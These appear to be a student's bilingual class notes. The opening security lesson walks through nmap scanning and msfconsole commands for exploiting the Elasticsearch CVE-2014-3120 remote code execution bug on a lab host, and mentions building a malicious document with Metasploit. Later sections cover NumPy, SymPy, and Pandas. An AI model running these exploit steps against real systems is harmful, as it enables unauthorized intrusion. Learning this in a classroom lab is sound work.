Hardware security: (2019.11.12)(Fly Dragon)

  ex. CPU
  >>Apache is an open source
  
  Big Problem: Remote Code Execution
  -------------------------------------------
  Words attack:
  Use metasploit to make a bad "Words" for others to download
  -------------------------------------------
  TODAY WORKS:
  USING KALI LINUX TO ATTACK METASPLOIT
  --------------------------
  Penetrstion Test (PT)
  > COMMAND 'nmap': find the open service
    -> nmap.org
    -> nmap.org/book
  > metasploit
    -> https://zh.wikipedia.org/wiki/Metasploit
  > msfconsole
  ----------------------------------------------------
  CVE Details 查漏洞
  
  ----------------------------------------------------
  make a folder in others' C:/
  STEPs:
  >tool: msfconsole
  >commands: search elasticsearch
             -> seach CVE-2014-3120
             -> use exploit/elasticsearch/script_mvel_rce 
                (strings after the word "use" is not a command; you can find it after entering the command "search CVE-2017-3120")
             -> show options
             -> set RHOST 10.0.2.4 (attacked ip)
             -> exploit
             -> then you can make the folder on the target compture!
  
  command:
  PWD -> to know where you are
  
==========================================================
Black Friday (2019.11.26)

Github:
(https://github.com/HappyHackingHigh/AI4high)
=> 找簡報
四大科學:
理論科學、實驗科學、xxxx、資訊科學

Julia is going to replace Python

SciPy.org

===========================================================
使用 sympy 執行 Symbolc Methmatics(符號計算) (2019.12.3)
numeric computation(數值計算) => Numpy
Symbolic mathematics(符號計算) => Sympy

Symbolic mathematics (https://github.com/drvinceknight?tab=repositories)
> 學習記得找官方網站 (https://www.sympy.org/en/index.html)

1. np.linalg (linear algebra)
2. seaborn (去 A14high 資料視覺化的利器)
3. matasplotlib 繪圖 (去 A14high 資料視覺化)
   #universial funtion
      
   
作業: 去 A14high 的 Datascience 找 readme
      -> 使用 python 學 Linear algebra
      -> 使用 sympy 執行 Symbolic mathematics (符號計算)

#描述統計學: 平均值、標準差...

kaggle -> AI contest
諾貝爾得主: 最好的學習要用圖形

Pandas: (Go to A14high 的 datascience 找 Pandas_Practice)






